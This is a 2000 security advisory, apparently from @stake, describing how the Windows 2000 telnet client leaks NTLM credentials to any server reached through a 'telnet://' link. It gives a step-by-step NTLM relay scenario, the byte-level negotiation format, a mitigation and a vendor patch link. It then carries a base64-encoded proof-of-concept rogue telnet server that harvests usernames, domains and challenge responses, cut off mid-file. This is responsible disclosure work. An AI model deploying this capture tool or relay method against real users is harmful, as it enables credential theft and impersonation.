[ SOURCE: http://www.secureroot.com/security/advisories/9693910683.html ] -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I wish this could have gone out sooner but there was an issue with the initial Microsoft patch which we found during our testing. They subsequently decided to fix the patch which delayed things a bit. We feel that if a vendor is taking an issue seriously and working diligently on a patch that we should hold off on vulnerability details and demonstration code until they have a chance to complete the fix properly. Be advised that the URLs included in the Vendor Response section of our advisory may not have replicated to all the Microsoft web servers yet. Weld Pond weld@atstake.com @stake Inc. www.atstake.com Security Advisory Advisory Name: NTLM Replaying via Windows 2000 Telnet Client (A091400-1) Release Date: 09/14/2000 Application: Windows 2000 Telnet Client Platform: Windows 2000 Severity: Attacker can impersonate users on the network Author: DilDog [dildog@atstake.com] Vendor Status: Vendor has patch Web: www.atstake.com/research/advisories/2000/a091400-1.txt Executive Summary: The telnet client in Windows 2000 may be launched via e-mail or web browsing, causing undesirable outbound authentication over the Internet to an untrusted third party. This can lead to compromised passwords or stolen credentials. Overview: The console telnet client that is packaged with Windows 2000 performs NTLM authentication by default, assuming that is going to be connecting to a Windows 2000 telnet server. This, however, is not necessarily the case, and it attempts authentication with any host it contacts. This combined with the fact that many email and web browser packages will parse the "telnet://" protocol and launch the telnet client to the desired host can lead to outbound NTLM authentications. These authentications can be cracked to determine passwords, or replayed to illegitimately access networked resources. The protocol used in the NTLM telnet transaction is described in detail below, and a proof of concept tool is provided that demonstrates the negotiation and logs responses from the client. Detailed Description: Windows 2000 is packaged with a console mode telnet client, specially designed for connecting to the Windows Telnet Server. Amongst the modifications to the standard telnet protocol, Microsoft has added a negotiation type to authenticate via NTLM with the target server, per the IETF working draft: http://www.ietf.org/internet-drafts/draft-tso-telnet-auth-enc-05.txt The NTLM protocol is authentication type 15. The telnet client will attempt negotiation with any server on the Internet, regardless of zone control or otherwise, unless NTLM authentication has been disabled in the telnet client (it is on by default). Initially, this seems benign, but when combined with the fact that Microsoft Internet Explorer, Outlook, Outlook Express, and Netscape Navigator and Messenger will all open telnet automatically when they encounter a "telnet://" URL. This allows an attacker to craft an email in the following format that forces an outbound authentication over any port: Note that this attack affects a multitude of HTML parsers, and is not reliant upon any form of Active Scripting, Javascript or otherwise, to launch the telnet client to the desired host. One of the severe ramafications of this is the ability for the NTLM challenge/response to be replayed to access a network resource. The scenario is as follows: A=attacker C=client S=server (network resource to attack) C has legitimate access to S 1. 'A' sends evil framed email to 'C'. 2. 'C' reads email, opens telnet connection to 'A' 3. 'A' receives telnet connection and makes SMB connection to 'S'. 4. 'S' receives SMB connection and sends challenge to 'A' 5. 'A' sends challenge to 'C'. 6. 'C' receives challenge, encrypts with hash, and sends response to 'A'. 7. 'A' receives response and sends it to 'S'. 8. 'S' receives response and authenticates 'A' to access requested SMB share. Another attack that is possible, is that since the challenge is chosen by the telnet server, a challenge could be specially chosen to send to the telnet client such that the response more easily cracked than with a random challenge. This effectively removes the extra complexity added by the challenge response mechanism that one normally encounters while attempting to crack passwords that were sniffed off of a network transaction. The normal NTLM challenge/response negotiation sequence occurs in the telnet protocol data stream in the following fashion: Nomenclature ============ IAC=255,DONT=254,DO=253,WONT=252,WILL=251,SB=250,SE=240 AUTH=37,IS=0,SEND=1,REPLY=2,NAME=3,NTLM=15 DD=32 bit little endian data DW=16 bit little endian data DB=8 bit little endian data US=Unicode string, no extra null terminator AS=Ansi string, no extra null terminator Client Server ======================== ======================== IAC WILL AUTH IAC SB AUTH SEND NTLM 0x00 IAC SE IAC SB AUTH IS NTLM 0x00 0x00 DD 0x00000020 ; Length DD 0x00000002 ; Type AS "NTLMSSP\0" ; Signature DD 0x00000001 ; Sequence # DD 0xE0008297 ; ?Flags? DD 0x00000000 ; Padding (room for client challenge?) DD 0x00000000 DD 0x00000000 DD 0x00000000 IAC SE IAC SB AUTH REPLY NTLM 0x00 0x01 DD 0x000000A8 ; Length DD 0x00000002 ; Type AS "NTLMSSP\0" ; Signature DD 0x00000002 ; Sequence# DW 0x0014,0x0014 ; Field ; length (min/max) DD 0x00000030 ; Offset ; from start DD 0xE0828295 ; ?Flags? DB 0x01 0x02 0x03 0x04 ; 8 byte DB 0x02 0x03 0x04 0x05 ; Challenge DD 0x00000000 ; Padding DD 0x00000000 DW 0x0064,0x0064 ; Next ; Field ; length(min/max) DD 0x00000044 ; Offset ; from start ... other fields... IAC SB AUTH IS NTLM 0x00 0x02 DD 0x000000B4 ; Length DD 0x00000002 ; Type AS "NTLMSSP\0" ; Signature DD 0x00000003 ; Sequence DW 0x0018,0x0018 ; NTLM Response Field length (min/max) DD 0x00000074 ; NTLM Response Offset DW 0x0018,0x0018 ; LM Response Field length (min/max) DD 0x0000008C ; LM Response Offset DW 0x0014,0x0014 ; Domain Name Field length (min/max) DD 0x00000040 ; Domain Name Offset DW 0x000C,0x000C ; User Name Field length (min/max) DD 0x00000054 ; User Name Offset DW 0x0014,0x0014 ; Machine Name Field length (min/max) DD 0x00000060 ; Machine Name Offset DW 0x0010,0x0010 ; ??? Field length (min/max) DD 0x000000A4 ; ??? Offset DD 0xE0808295 ; ?Flags? US "ABCDEGHIJK" ; Domain Name US "foobar" ; User Name US "ABCDEGHIJK" ; Machine Name DB 1,2,3,4,5,6,7,8 ; 24 Bytes of NTLM Response DB 1,2,3,4,5,6,7,8 DB 1,2,3,4,5,6,7,8 DB 1,2,3,4,5,6,7,8 ; 24 Bytes of LM Response DB 1,2,3,4,5,6,7,8 DB 1,2,3,4,5,6,7,8 DB 1,2,3,4,5,6,7,8 ; 16 Bytes of Unknown Cruft DB 1,2,3,4,5,6,7,8 IAC SE IAC SB AUTH REPLY NTLM 0x00 0x03 DD 0xFDFFF0FF ; Flags? DB 0x18 .... Temporary Solution: Run "telnet" at the command prompt, enter "unset ntlm" and then exit telnet to save your preferences into the registry. You may go so far as removing the telnet URL type from the registry if you are a proficient registry hacker, unsetting the NTLM authentication should be sufficient until an official patch is available. Vendor Response: Microsoft has released a bulletin and patch for this issue. Bulletin MS00-067 http://www.microsoft.com/technet/security/bulletin/MS00-067.asp Frequently Asked Questions: http://www.microsoft.com/technet/security/bulletin/fq00-067.asp Patch: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24319 Proof-of-Concept Code: This code will act as a rogue telnet server, and send a constant challenge of 0xFF bytes to any telnet client that connects to it, and it logs the response to a disk file. The code was written under Linux. ===================== Content-Description: NTLM Rogue Telnet Server Content-Disposition: attachment; filename="talkntlm.cpp" Content-Transfer-Encoding: BASE64 Content-Type: text/plain LyogVGFsa05UTE0gLSBOVExNIExvZ2dpbmcgVGVsbmV0IFNlcnZlcgogKiBkaWxkb2dAYXRz dGFrZS5jb20KICogOC8xNC8wMAogKiBDb3B5cmlnaHQgKEMpIDIwMDAgQHN0YWtlLCBJbmMu CiAqLwoKI2luY2x1ZGU8c3RkaW8uaD4KI2luY2x1ZGU8c3RyaW5nLmg+CiNpbmNsdWRlPHVu aXN0ZC5oPgojaW5jbHVkZTxzdGRsaWIuaD4KI2luY2x1ZGU8Y3R5cGUuaD4KI2luY2x1ZGU8 c3lzL3NvY2tldC5oPgojaW5jbHVkZTxzeXMvdHlwZXMuaD4KI2luY2x1ZGU8c3lzL3dhaXQu aD4KI2luY2x1ZGU8bmV0aW5ldC9pbi5oPgojaW5jbHVkZTxhcnBhL2luZXQuaD4KCiNkZWZp bmUgTUFKT1JfVkVSU0lPTiAxCiNkZWZpbmUgTUlOT1JfVkVSU0lPTiAwCgojZGVmaW5lIElB QyAgICAgMjU1ICAgICAgICAgICAgIC8qIGludGVycHJldCBhcyBjb21tYW5kOiAqLwojZGVm aW5lIERPTlQgICAgMjU0ICAgICAgICAgICAgIC8qIHlvdSBhcmUgbm90IHRvIHVzZSBvcHRp b24gKi8KI2RlZmluZSBETyAgICAgIDI1MyAgICAgICAgICAgICAvKiBwbGVhc2UsIHlvdSB1 c2Ugb3B0aW9uICovCiNkZWZpbmUgV09OVCAgICAyNTIgICAgICAgICAgICAgLyogSSB3b24n dCB1c2Ugb3B0aW9uICovCiNkZWZpbmUgV0lMTCAgICAyNTEgICAgICAgICAgICAgLyogSSB3 aWxsIHVzZSBvcHRpb24gKi8KI2RlZmluZSBTQiAgICAgIDI1MCAgICAgICAgICAgICAvKiBp bnRlcnByZXQgYXMgc3VibmVnb3RpYXRpb24gKi8gICAgICAgICAgICAgIAojZGVmaW5lIFNF ICAgICAgMjQwICAgICAgICAgICAgIC8qIGVuZCBzdWIgbmVnb3RpYXRpb24gKi8KI2RlZmlu ZSBBVVRIICAgIDM3CiNkZWZpbmUgSVMgICAgICAwCiNkZWZpbmUgU0VORCAgICAxCiNkZWZp bmUgUkVQTFkgICAyCiNkZWZpbmUgTkFNRSAgICAzCiNkZWZpbmUgTlRMTSAgICAxNQoKI2Rl ZmluZSBBQ0NFUFQgMQoKdHlwZWRlZiBlbnVtIHsKICBNRVRIT0RfTk9ORT0wLAogIE1FVEhP RF9URUxORVQKfSBNRVRIT0Q7Cgp0eXBlZGVmIGVudW0gewogIFNVQk1FVEhPRF9OT05FPTAs CiAgU1VCTUVUSE9EX0xPRywKfSBTVUJNRVRIT0Q7CgojZGVmaW5lIENPTU1TT0NLX0JVRlNJ WiAyMDQ4CkZJTEUgKmdfZkNvbW1Tb2NrOwpjaGFyIGdfQ29tbVNvY2tCdWZbQ09NTVNPQ0tf QlVGU0laXTsKCnZvaWQgZXJyb3IoY29uc3QgY2hhciAqc3RyKQp7CiAgZmZsdXNoKHN0ZG91 dCk7CiAgZnByaW50ZihzdGRlcnIsc3RyKTsKICBmZmx1c2goc3RkZXJyKTsKfQoKdW5zaWdu ZWQgY2hhciBnZXRiKHZvaWQpCnsKICB1bnNpZ25lZCBjaGFyIGI9MDsKICBmcmVhZCgmYiwx LDEsZ19mQ29tbVNvY2spOwogIHJldHVybiBiOwp9Cgp1bnNpZ25lZCBzaG9ydCBnZXRkd2wo dm9pZCkKewogIHVuc2lnbmVkIHNob3J0IHM9MDsKICBzfD0oKHVuc2lnbmVkIHNob3J0KWdl dGIoKSk7CiAgc3w9KCh1bnNpZ25lZCBzaG9ydClnZXRiKCkpPDw4OwogIHJldHVybiBzOwp9 Cgp1bnNpZ25lZCBsb25nIGdldGRkbCh2b2lkKQp7CiAgdW5zaWduZWQgbG9uZyBsPTA7CiAg bHw9KCh1bnNpZ25lZCBsb25nKWdldGIoKSk7CiAgbHw9KCh1bnNpZ25lZCBsb25nKWdldGIo KSk8PDg7CiAgbHw9KCh1bnNpZ25lZCBsb25nKWdldGIoKSk8PDE2OwogIGx8PSgodW5zaWdu ZWQgbG9uZylnZXRiKCkpPDwyNDsKICByZXR1cm4gbDsKfQoKdm9pZCBwdXRiKHVuc2lnbmVk IGNoYXIgYykKewogIGZ3cml0ZSgmYywxLDEsZ19mQ29tbVNvY2spOwp9Cgp2b2lkIHB1dGR3 bCh1bnNpZ25lZCBzaG9ydCB3KQp7CiAgcHV0Yih3JjI1NSk7CiAgcHV0Yigodz4+OCkmMjU1 KTsKfQoKdm9pZCBwdXRkZGwodW5zaWduZWQgbG9uZyBkKQp7CiAgcHV0YihkJjI1NSk7CiAg cHV0YigoZD4+OCkmMjU1KTsKICBwdXRiKChkPj4xNikmMjU1KTsKICBwdXRiKChkPj4yNCkm MjU1KTsKfQoKCnZvaWQgcHV0YXJyYihpbnQgbiwgdW5zaWduZWQgY2hhciAqYikKewogIGlu dCBpOwogIGZvcihpPTA7aTxuO2krKykgewogICAgcHV0YihiW2ldKTsKICB9Cn0KCnZvaWQg cHV0YXJyYyhpbnQgbiwgY2hhciAqYykKewogIHB1dGFycmIobiwodW5zaWduZWQgY2hhciAq KWMpOwp9Cgp2b2lkIHB1dGZsdXNoKHZvaWQpCnsKICBmZmx1c2goZ19mQ29tbVNvY2spOwp9 CgoKdm9pZCBkZWJ1Z2IodW5zaWduZWQgY2hhciBjKQp7CiAgZnByaW50ZihzdGRlcnIsIiVk XHRcdCVYXHQnJWMnXG5cciIsYyxjLChpc2FsbnVtKGMpP2M6JyAnKSk7Cn0KCgppbnQgbGlz dGVucG9ydChpbnQgcG9ydCwgc3RydWN0IHNvY2thZGRyX2luICpyc2FkZHIpCnsKICAvLyBD cmVhdGUgc29ja2V0CiAgaW50IHM9c29ja2V0KEFGX0lORVQsU09DS19TVFJFQU0sSVBQUk9U T19UQ1ApOwogIGlmKHM8MCkgewogICAgZXJyb3IoImNvdWxkbid0IGNyZWF0ZSBzb2NrZXQu XG4iKTsKICAgIHJldHVybiAtMTsKICB9CgogIGludCByZXVzZT0xOwogIGlmKHNldHNvY2tv cHQocyxTT0xfU09DS0VULFNPX1JFVVNFQUREUiwmcmV1c2Usc2l6ZW9mKGludCkpPDApIHsK ICAgIGVycm9yKCJjb3VsZG4ndCBzZXQgc29ja2V0IG9wdGlvbi5cbiIpOwogICAgY2xvc2Uo cyk7CiAgICByZXR1cm4gLTI7CiAgfQoKICAvLyBCaW5kIHRvIHBvcnQKICBzdHJ1Y3Qgc29j a2FkZHJfaW4gc2FkZHI7CiAgbWVtc2V0KCZzYWRkciwwLHNpemVvZihzdHJ1Y3Qgc29ja2Fk ZHJfaW4pKTsKICBzYWRkci5zaW5fcG9ydD1odG9ucyhwb3J0KTsKICBzYWRkci5zaW5fZmFt aWx5PUFGX0lORVQ7CiAKICBpZihiaW5kKHMsKHN0cnVjdCBzb2NrYWRkciAqKSZzYWRkcixz aXplb2Yoc3RydWN0IHNvY2thZGRyX2luKSk8MCkgewogICAgZXJyb3IoImNvdWxkbid0IGJp bmQuXG4iKTsKICAgIGNsb3NlKHMpOwogICAgcmV0dXJuIC0zOwogIH0KCiAgLy8gTGlzdGVu IG9uIHBvcnQ7CiAgaWYobGlzdGVuKHMsMSk8MCkgewogICAgZXJyb3IoImNvdWxkbid0IGxp c3Rlbi5cbiIpOwogICAgY2xvc2Uocyk7CiAgICByZXR1cm4gLTQ7CiAgfQoKICAvLyBBY2Nl cHQgY29ubmVjdGlvbgogIHVuc2lnbmVkIGludCBzb2NrbGVuPXNpemVvZihzdHJ1Y3Qgc29j a2FkZHJfaW4pOwogIG1lbXNldChyc2FkZHIsMCxzb2NrbGVuKTsKICBpbnQgYXM7CiAgaWYo KGFzPWFjY2VwdChzLChzdHJ1Y3Qgc29ja2FkZHIgKilyc2FkZHIsJnNvY2tsZW4pKTwwKSB7 CiAgICBlcnJvcigiY291bGRuJ3QgYWNjZXB0LlxuIik7CiAgICBjbG9zZShzKTsKICAgIHJl dHVybiAtNTsKICB9CgogIC8vIENsb3NlIGxpc3RlbmVyCiAgY2xvc2Uocyk7CiAgCiAgcmV0 dXJuIGFzOwp9CgppbnQgZG9fdGVsbmV0X2xvZyhpbnQgcG9ydCwgY2hhciAqbG9nZmlsZSkK ewoKICBGSUxFICpsZj1OVUxMOwoKICB3aGlsZSgxKSB7CiAgICAKICAgIC8vIFdhaXQgZm9y IHRlbG5ldCBjb25uZWN0aW9uIHRvIGNvbWUgaW4KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiBz YWRkcjsKICAgIGludCBzOwogICAgcHJpbnRmKCJsaXN0ZW5pbmcgb24gcG9ydCAlZC5cbiIs cG9ydCk7CiAgICBpZigocz1saXN0ZW5wb3J0KHBvcnQsJnNhZGRyKSk8MCkgewogICAgICBl cnJvcigidGVsbmV0IGxvZ2dpbmcgYWJvcnQuXG4iKTsKICAgICAgcmV0dXJuIC0xOwogICAg fQogICAgcHJpbnRmKCJyZWNpZXZlZCB0ZWxuZXQgY29ubmVjdGlvbiBmcm9tICVzOiV1Llxu IiwKCSAgIGluZXRfbnRvYShzYWRkci5zaW5fYWRkciksbnRvaHMoc2FkZHIuc2luX3BvcnQp KTsKCiAgICAvLyBTZXQgdGhpcyBzb2NrZXQgYXMgb3V0IGJ1ZmZlcmVkIHBhY2tldCBzb2Nr ZXQKICAgIGdfZkNvbW1Tb2NrPWZkb3BlbihzLCJyK2IiKTsKICAgIGlmKGdfZkNvbW1Tb2Nr PT1OVUxMKSB7CiAgICAgIGVycm9yKCJjb3VsZG4ndCBmZG9wZW4gY29tbSBzb2NrZXQuXG4i KTsKICAgICAgY2xvc2Uocyk7CiAgICAgIHJldHVybiAtMjsKICAgIH0KICAgIHNldHZidWYo Z19mQ29tbVNvY2ssZ19Db21tU29ja0J1ZixfSU9GQkYsQ09NTVNPQ0tfQlVGU0laKTsKCiAg ICAvLyBPcGVuIGxvZ2dpbmcgZmlsZQogICAgbGY9Zm9wZW4obG9nZmlsZSwiYSt0Iik7CiAg ICBpZihsZj09TlVMTCkgewogICAgICBlcnJvcigiY291bGRuJ3Qgb3BlbiBsb2cgZmlsZS5c biIpOwogICAgICBmY2xvc2UoZ19mQ29tbVNvY2spOwogICAgICByZXR1cm4gLTM7CiAgICB9 CiAgICAKICAgIC8vIENoYWxsZW5nZSB0byBzZW5kCiAgICB1bnNpZ25lZCBjaGFyIGNoYWxs ZW5nZVs4XT17MjU1LDI1NSwyNTUsMjU1LDI1NSwyNTUsMjU1LDI1NX07CgogICAgLy8gU3Rh cnQgYXV0aGVudGljYXRpb24gcHJvY2VzcwogICAgdW5zaWduZWQgY2hhciAqcmVzcGJ1Zj1O VUxMOwogICAgaW50IHNpemU9MDsKICAgIAogICAgcHV0YihJQUMpOwogICAgcHV0YihETyk7 CiAgICBwdXRiKEFVVEgpOwogICAgcHV0Zmx1c2goKTsKICAgIHByaW50ZigiPj4gSUFDIERP IEFVVEhcbiIpOwogICAgCiAgICAvLyBTZWUgaWYgY2xpZW50IHdhbnRzIHRvIGF1dGhlbnRp Y2F0ZQogICAgaWYoZ2V0YigpIT1JQUMpIGdvdG8gdGVsbmV0bG9nZmFpbDsKICAgIGlmKGdl dGIoKSE9V0lMTCkgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgaWYoZ2V0YigpIT1BVVRIKSBn b3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBwcmludGYoIjw8IElBQyBXSUxMIEFVVEhcbiIpOwog ICAgCiAgICAvLyBQcmVzZW50IGF1dGhlbnRpY2F0aW9uIG1ldGhvZHMKICAgIHB1dGIoSUFD KTsKICAgIHB1dGIoU0IpOwogICAgcHV0YihBVVRIKTsKICAgIHB1dGIoU0VORCk7CiAgICBw dXRiKE5UTE0pOwogICAgcHV0YigwKTsKICAgIHB1dGIoSUFDKTsKICAgIHB1dGIoU0UpOwog ICAgcHV0Zmx1c2goKTsKICAgIHByaW50ZigiPj4gSUFDIFNCIEFVVEggU0VORCBOVExNIDAg SUFDIFNFXG4iKTsKICAgIAogICAgLy8gR2V0IE5UTE1TU1AgaW5pdGlhbCByZXF1ZXN0CiAg ICBpZihnZXRiKCkhPUlBQykgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgaWYoZ2V0YigpIT1T QikgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgaWYoZ2V0YigpIT1BVVRIKSBnb3RvIHRlbG5l dGxvZ2ZhaWw7CiAgICBpZihnZXRiKCkhPUlTKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBp ZihnZXRiKCkhPU5UTE0pIGdvdG8gdGVsbmV0bG9nZmFpbDsKICAgIGlmKGdldGIoKSE9MCkg Z290byB0ZWxuZXRsb2dmYWlsOwogICAgaWYoZ2V0YigpIT0wKSBnb3RvIHRlbG5ldGxvZ2Zh aWw7CiAgICAKICAgIHNpemU9Z2V0ZGRsKCkrNDsKICAgIGlmKHNpemU+MjA0OCkgZ290byB0 ZWxuZXRsb2dmYWlsOwogICAgcmVzcGJ1Zj0odW5zaWduZWQgY2hhciAqKW1hbGxvYyhzaXpl KTsKICAgIGludCBpOwogICAgZm9yKGk9MDtpPHNpemU7aSsrKSB7CiAgICAgIHJlc3BidWZb aV09Z2V0YigpOwogICAgfQogICAgZnJlZShyZXNwYnVmKTsKICAgIGlmKGdldGIoKSE9SUFD KSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBpZihnZXRiKCkhPVNFKSBnb3RvIHRlbG5ldGxv Z2ZhaWw7CiAgICAKICAgIHByaW50ZigiPDwgSUFDIFNCIEFVVEggSVMgTlRMTSAwIDAgLi4u IElBQyBTRVxuIik7CiAgICAKICAgIC8vIFNlbmQgYWNjZXB0CiAgICBwdXRiKElBQyk7CiAg ICBwdXRiKFNCKTsKICAgIHB1dGIoQVVUSCk7CiAgICBwdXRiKFJFUExZKTsKICAgIHB1dGIo TlRMTSk7CiAgICBwdXRiKDApOwogICAgcHV0YihBQ0NFUFQpOwogICAgCiAgICBwdXRkZGwo MHhBOCk7CiAgICBwdXRkZGwoMHgyKTsKICAgIHB1dGFycmMoOCwiTlRMTVNTUCIpOwogICAg cHV0ZGRsKDB4Mik7CiAgICBwdXRkd2woMHgxNCk7CiAgICBwdXRkd2woMHgxNCk7CiAgICBw dXRkZGwoMHgzMCk7CiAgICBwdXRkZGwoMHhFMDgyODI5NSk7CiAgICBwdXRhcnJiKDgsY2hh bGxlbmdlKTsKICAgIHB1dGFycmMoOCwiXDBcMFwwXDBcMFwwXDBcMCIpOwogICAgcHV0ZHds KDB4NjQpOwogICAgcHV0ZHdsKDB4NjQpOwogICAgcHV0ZGRsKDB4NDQpOwogICAgcHV0YXJy YygyMCwiQVwwQlwwQ1wwRFwwRVwwRlwwR1wwSFwwSVwwSlwwIik7CiAgICBwdXRkd2woMHgy KTsKICAgIHB1dGR3bCgweDE0KTsKICAgIHB1dGFycmMoMjAsIkFcMEJcMENcMERcMEVcMEZc MEdcMEhcMElcMEpcMCIpOwogICAgcHV0ZHdsKDB4MSk7CiAgICBwdXRkd2woMHgxNCk7CiAg ICBwdXRhcnJjKDIwLCJBXDBCXDBDXDBEXDBFXDBGXDBHXDBIXDBJXDBKXDAiKTsKICAgIHB1 dGR3bCgweDQpOwogICAgcHV0ZHdsKDB4MTQpOwogICAgcHV0YXJyYygyMCwiQVwwQlwwQ1ww RFwwRVwwRlwwR1wwSFwwSVwwSlwwIik7CiAgICBwdXRkd2woMHgzKTsKICAgIHB1dGR3bCgw eDE0KTsgIAogICAgcHV0YXJyYygyMCwiQVwwQlwwQ1wwRFwwRVwwRlwwR1wwSFwwSVwwSlww Iik7CiAgICBwdXRkZGwoMCk7CgogICAgcHV0YihJQUMpOwogICAgcHV0YihTRSk7CiAgICBw dXRmbHVzaCgpOwogICAgcHJpbnRmKCI+PiBJQUMgU0IgQVVUSCBSRVBMWSBOVExNIDAgMSAu Li4gY2hhbGxlbmdlIC4uLiBJQUMgU0VcbiIpOwogIAogICAgLy8gR2V0IHRoZSByZXBseSBw YWNrZXQKICAgIGlmKGdldGIoKSE9SUFDKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBpZihn ZXRiKCkhPVNCKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBpZihnZXRiKCkhPUFVVEgpIGdv dG8gdGVsbmV0bG9nZmFpbDsKICAgIGlmKGdldGIoKSE9SVMpIGdvdG8gdGVsbmV0bG9nZmFp bDsKICAgIGlmKGdldGIoKSE9TlRMTSkgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgaWYoZ2V0 YigpIT0wKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBpZihnZXRiKCkhPTIpIGdvdG8gdGVs bmV0bG9nZmFpbDsKCiAgICBzaXplPWdldGRkbCgpKzQ7CiAgICBpZihzaXplPjIwNDggfHwg c2l6ZTw2NCkgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgcHJpbnRmKCI4XG4iKTsKICAgIHJl c3BidWY9KHVuc2lnbmVkIGNoYXIgKiltYWxsb2Moc2l6ZSk7CiAgICBmb3IoaT0wO2k8c2l6 ZTtpKyspIHsKICAgICAgcmVzcGJ1ZltpXT1nZXRiKCk7CiAgICAgIC8vZnByaW50ZihzdGRl cnIsIiUyLjJYOiAiLGkpOwogICAgICAvL2RlYnVnYihyZXNwYnVmW2ldKTsKICAgIH0KICAg IGlmKGdldGIoKSE9SUFDKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBpZihnZXRiKCkhPVNF KSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CgogICAgcHJpbnRmKCI8PCBJQUMgU0IgQVVUSCBJUyBO VExNIDAgMiAuLi4gcmVzcG9uc2UgLi4uIElBQyBTRVxuIik7CiAgICAKICAgIAogICAgLy8g R2V0IHVzZXJuYW1lCiAgICBpbnQgdXNlcm5hbWVsZW4sdXNlcm5hbWVvZmY7CiAgICBjaGFy ICp1c2VybmFtZTsKICAgIHVzZXJuYW1lbGVuPXJlc3BidWZbMHgyOF0gfCAocmVzcGJ1Zlsw eDI5XTw8OCk7CiAgICB1c2VybmFtZW9mZj1yZXNwYnVmWzB4MkNdIHwgKHJlc3BidWZbMHgy RF08PDgpIHwgCiAgICAgIChyZXNwYnVmWzB4MkVdPDwxNikgfCAocmVzcGJ1ZlsweDJGXTw8 MjQpOwogICAgdXNlcm5hbWU9KGNoYXIgKiltYWxsb2ModXNlcm5hbWVsZW4pOwogICAgaWYo IXVzZXJuYW1lKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBtZW1jcHkodXNlcm5hbWUsJnJl c3BidWZbdXNlcm5hbWVvZmYrNF0sdXNlcm5hbWVsZW4pOwogICAgcHJpbnRmKCJVc2VybmFt ZTogIik7CiAgICBmb3IoaT0wO2k8dXNlcm5hbWVsZW47aSs9MikgewogICAgICBwcmludGYo IiVjIix1c2VybmFtZVtpXSk7CiAgICAgIGZwcmludGYobGYsIiVjIix1c2VybmFtZVtpXSk7 CiAgICAgIHVzZXJuYW1lW2k+PjFdPXVzZXJuYW1lW2ldOwogICAgfQogICAgdXNlcm5hbWVs ZW4+Pj0xOwogICAgcHJpbnRmKCJcbiIpOwogICAgZnByaW50ZihsZiwiOiIpOwogICAgZnJl ZSh1c2VybmFtZSk7CiAgICAKICAgIC8vIEdldCBkb21haW5uYW1lCiAgICBpbnQgZG9tYWlu bmFtZWxlbixkb21haW5uYW1lb2ZmOwogICAgY2hhciAqZG9tYWlubmFtZTsKICAgIGRvbWFp bm5hbWVsZW49cmVzcGJ1ZlsweDIwXSB8IChyZXNwYnVmWzB4MjFdPDw4KTsKICAgIGRvbWFp bm5hbWVvZmY9cmVzcGJ1ZlsweDI0XSB8IChyZXNwYnVmWzB4MjVdPDw4KSB8IAogICAgICAo cmVzcGJ1ZlsweDI2XTw8MTYpIHwgKHJlc3BidWZbMHgyN108PDI0KTsKICAgIGRvbWFpbm5h bWU9KGNoYXIgKiltYWxsb2MoZG9tYWlubmFtZWxlbik7CiAgICBpZighZG9tYWlubmFtZSkg Z290byB0ZWxuZXRsb2dmYWlsOwogICAgbWVtY3B5KGRvbWFpbm5hbWUsJnJlc3BidWZbZG9t YWlubmFtZW9mZis0XSxkb21haW5uYW1lbGVuKTsKICAgIHByaW50ZigiRG9tYWluOiAiKTsK ICAgIGZvcihpPTA7aTxkb21haW5uYW1lbGVuO2krPTIpIHsKICAgICAgcHJpbnRmKCIlYyIs ZG9tYWlubmFtZVtpXSk7CiAgICAgIGZwcmludGYobGYsIiVjIix1c2VybmFtZVtpXSk7CiAg ICAgIGRvbWFpbm5hbWVbaT4+MV09ZG9tYWlubmFtZVtpXTsKICAgIH0KICAgIGRvbWFpbm5h bWVsZW4+Pj0xOwogICAgcHJpbnRmKCJcbiIpOwogICAgZnByaW50ZihsZiwiOiIpOwogICAg ZnJlZShkb21haW5uYW1lKTsKICAgIAogICAgLy8gV3JpdGUgY2hhbGxlbmdlCiAgICBmcHJp bnRmKGxmLCIlMi4yWCUyLjJYJTIuMlglMi4yWCUyLjJYJTIuMlglMi4yWCUyLjJYOiIsCgkg ICAgY2hhbGxlbmdlWzBdLGNoYWxsZW5nZVsxXSxjaGFsbGVuZ2VbMl0sY2hhbGxlbmdlWzNd LAoJICAgIGNoYWxsZW5nZVs0XSxjaGFsbGVuZ2VbNV0sY2hhbGxlbmdlWzZdLGNoYWxsZW5n ZVs3XSk7CgogICAgLy8gR2V0IE5UIHJlc3BvbnNlCiAgICBpbnQgbnRyZXNwbGVuLG50cmVz cG9mZjsKICAgIHVuc2lnbmVkIGNoYXIgKm50cmVzcDsKICAgIG50cmVzcGxlbj1yZXNwYnVm WzB4MTBdIHwgKHJlc3BidWZbMHgxMV08PDgpOwogICAgbnRyZXNwb2ZmPXJlc3BidWZbMHgx NF07Ly8gfCAocmVzcGJ1ZlsweDE1XTw8OCkgfCAocmVzcGJ1ZlsweDE2XTw8MTYpIHwgKHJl c3BidWZbMHgxN108PDI0KTsKICAgIG50cmVzcD0odW5zaWduZWQgY2hhciAqKW1hbGxvYyhu dHJlc3BsZW4pOwogICAgaWYoIW50cmVzcCkgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgbWVt Y3B5KG50cmVzcCwmcmVzcGJ1ZltudHJlc3BvZmYrNF0sbnRyZXNwbGVuKTsKICAgIHByaW50 ZigiTlQgUmVzcG9uc2U6XG4iKTsKICAgIGZvcihpPTA7aTxudHJlc3BsZW47aSsrKSB7CiAg ICAgIHByaW50ZigiJTIuMlggIixudHJlc3BbaV0pOwogICAgICBmcHJpbnRmKGxmLCIlMi4y WCIsbnRyZXNwW2ldKTsKICAgICAgaWYoaSU4PT03KSBwcmludGYoIlxuIik7CiAgICB9CiAg ICBwcmludGYoIlxuIik7CiAgICBmcHJpbnRmKGxmLCI6Iik7CiAgICBmcmVlKG50cmVzcCk7 CiAgICAKICAgIC8vIEdldCBMTSByZXNwb25zZQogICAgaW50IGxtcmVzcGxlbixsbXJlc3Bv ZmY7CiAgICB1bnNpZ25lZCBjaGFyICpsbXJlc3A7CiAgICBsbXJlc3BsZW49cmVzcGJ1Zlsw 